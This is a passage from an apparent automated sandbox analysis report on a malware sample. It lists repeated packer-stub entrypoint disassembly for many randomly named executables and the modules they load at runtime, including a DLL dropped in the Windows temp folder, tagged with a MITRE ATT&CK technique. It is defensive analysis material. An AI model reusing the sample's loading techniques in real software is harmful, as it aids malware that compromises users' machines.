0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vlrlrxl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bdjjvlh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4060084.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"084822.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jhftx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4602048.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"822462.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8024206.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"664222.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6264048.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"666086.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"thbfpv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ttnbl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ptfff.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"dhxhp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"dhxhp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dhxhp.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"dhxhp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dhxhp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"dhxhp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"lnvjpll.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"lnvjpll.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lnvjpll.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"lnvjpll.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lnvjpll.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"0228060.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"0228060.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0228060.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"0228060.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0228060.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"4404242.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"4404242.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4404242.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"4404242.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4404242.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"nrdphjv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"nrdphjv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nrdphjv.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"nrdphjv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nrdphjv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"rpbpdxh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"rpbpdxh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rpbpdxh.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"rpbpdxh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rpbpdxh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"rpbpdxh.exe\" loaded module \"MSVCRT.DLL\" at base 77c30000\n \"rpbpdxh.exe\" loaded module \"SHLWAPI.DLL\" at base 769f0000\n \"rpbpdxh.exe\" loaded module \"USER32.DLL\" at base 75d60000\n \"rpbpdxh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"408802.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"408802.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"408802.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"408802.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"408802.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"6644862.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"848862.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"848862.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"848862.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"848862.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22202.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"22202.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22202.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"22202.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22202.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"lvlfrln.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"lvlfrln.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lvlfrln.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"lvlfrln.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lvlfrln.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"6248060.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"6248060.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6248060.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"6248060.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6248060.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"086880.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"086880.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"086880.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"086880.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"086880.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"4424228.exe\" loaded module \"MSVCRT.DLL\" at base 77c30000\n \"4424228.exe\" loaded module \"SHLWAPI.DLL\" at base 769f0000\n \"4424228.exe\" loaded module \"USER32.DLL\" at base 75d60000\n \"4424228.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"66206.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"66206.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"66206.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"66206.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0488840.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"0488840.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0488840.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"0488840.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0488840.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"ptvbh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"bnrrj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"bnrrj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bnrrj.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"bnrrj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bnrrj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"288226.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"288226.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"288226.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"288226.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"288226.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"288226.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"08246.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"08246.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"08246.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"08246.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"08246.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"dhfjp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"dhfjp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dhfjp.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"dhfjp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dhfjp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"dhfjp.exe\" loaded module \"MSVCRT.DLL\" at base 77c30000\n \"dhfjp.exe\" loaded module \"SHLWAPI.DLL\" at base 769f0000\n \"dhfjp.exe\" loaded module \"USER32.DLL\" at base 75d60000\n \"dhfjp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"dvlplh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"dvlplh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dvlplh.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"dvlplh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dvlplh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"206020.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"206020.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"206020.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"206020.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"206020.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"8204220.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"8204220.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8204220.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"8204220.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8204220.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"04620.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"04620.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"04620.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"04620.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bjjnnr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"bjjnnr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bjjnnr.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"bjjnnr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bjjnnr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"bjjnnr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"tfvnr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"tfvnr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tfvnr.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"tfvnr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tfvnr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"ldjdlxp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"ttrtrr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"xjjln.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"xjjln.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xjjln.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"xjjln.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xjjln.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"ffpprbb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"ffpprbb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ffpprbb.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"ffpprbb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ffpprbb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"xrfrdxf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"xrfrdxf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xrfrdxf.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"xrfrdxf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xrfrdxf.exe\" loaded module \"KERNEL32.DLL\" at base 76a50000\n \"xrfrdxf.exe\" loaded module \"MSVCRT.DLL\" at base 77c30000\n \"xrfrdxf.exe\" loaded module \"SHLWAPI.DLL\" at base 769f0000\n \"xrfrdxf.exe\" loaded module \"USER32.DLL\" at base 75d60000\n \"xrfrdxf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"ptfff.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"ptfff.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ptfff.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"ptfff.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ptfff.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"ttnbl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"ttnbl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ttnbl.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"ttnbl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ttnbl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"664222.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"664222.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"664222.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"664222.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"664222.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"664222.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75840000\n \"8024206.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"8024206.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8024206.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"8024206.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8024206.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bc40000\n \"4602048.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71400000\n \"4602048.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4602048.exe\" loaded module \"KERNEL32\" at base 76a50000\n \"4602048.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005920)\n 